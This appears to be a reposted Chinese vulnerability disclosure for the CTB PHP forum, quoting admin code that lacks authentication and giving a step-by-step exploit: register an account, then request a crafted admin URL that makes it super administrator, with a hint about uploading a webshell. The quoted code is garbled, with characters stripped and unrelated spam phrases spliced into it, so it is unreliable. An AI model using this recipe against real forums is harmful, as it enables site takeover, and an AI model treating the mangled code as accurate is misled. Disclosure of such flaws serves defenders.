>>>dedicatedthisscraptocaojing<<<
涉及版本:
^^^^^^^
目前所有版本(现在1.3alpha为最高版本)
描述:
^^^^^^
ctb是一款由实易数码<11cn.org>;开发和维护的源代码开放的php论坛。由于其后台管理文件验证存在缺陷,可能导致非法用户直接添加论坛超级管理员,进而威胁论坛或服务器安全。
具体:
^^^^
ctb书写非常规范,代码井然有序,赏心悦目,的确是优美的程序;特别是其功能模块,着实让小弟学习了一把。但安全方面却令人堪忧:
试看如下代码:
/admin/main.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
//获取get变量
if(is_array($_get)){
foreach($_getas$k=>$v){
if(is_array($_get[$k])){
foreach($_get[$k]as$k2=>$v2){
$return[$k][$k2]=$v2;
}
}el{
$return[$k]=$v;
}
}
}
…
$mod=ist($_get[‘mod’])?$_get[‘mod’]:$_post[‘mod’];
if(!file_exists($mod.”.php”{
$mod=“mainright”;
}
require_once($mod.”.php”;
//—————&教师节老师祝福语#8212;———————————————————–
//初始化类变量
$ctb=newmodule;
$ctb->t=$t;
$ctb->tplpath=“./templates”;
$ctb->input=$return;
$ctb->ss=ist($_cookie[“ss_adminname”])?$_cookie:$_ssion;
$ctb->execute();
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
这里没有任何验证,我们看看添加管理员的文件:
/admin/systemur.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
classmoduleextendscommonclass
//系统管理模块子类
{
functionexecute(){
switch($this->input[‘action’]){
…
ca‘addsystemur’:
$this->addsystemur();
break;
…
门面房租赁合同范本}
}
functionaddsystemur()
{
//输入数据简单格式化
$this->inputcheck(“main.php?mod=systemur&action=showsystemur”;
//执行添加操作
$this->file=“../”.$this->t[datapath].”/urs/list.php”;
$systemline=$this->lect(4,$this->inpu无穷动评价t[‘systemurn统招全日制本科ame’]);
….
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~梁博 我是歌手~~~~~~~~~~~~~
依然没有验证,一路顺利啊!
利用方法:
^^^^^^^
先注册一个用户:
登陆id:cat
用户名:dog
密码:ilikecat
重复密码:ilikecat
信箱:cat@dog.com
接着提交如下url:
http://www.target.com/ctb/admin/main.php?mod=systemur&systemurname=dog&systemurmode=1&action=addsystemur
哈哈,你现在已经是超级管理员了,不相信?提交如下url后台登陆:
/d/file/titlepic/main.php
管理名称:cat
管理密码:ilikecat
咦…还真成功了!
你现在是不是想更改后台上传文件类型,然后uploadwebshell?哼,被我猜到了吧…
后记:另外发现ctb代码注释有些扎眼的错别字,大煞风景,希望可以一起修正。
本文发布于:2023-04-06 07:52:18,感谢您对本站的认可!
本文链接:https://www.wtabcd.cn/fanwen/zuowen/d9a8c8a02cc091a4b9ad617dced73292.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文word下载地址:漂亮但不安全的CTB.doc
本文 PDF 下载地址:漂亮但不安全的CTB.pdf
留言与评论(共有 0 条评论) |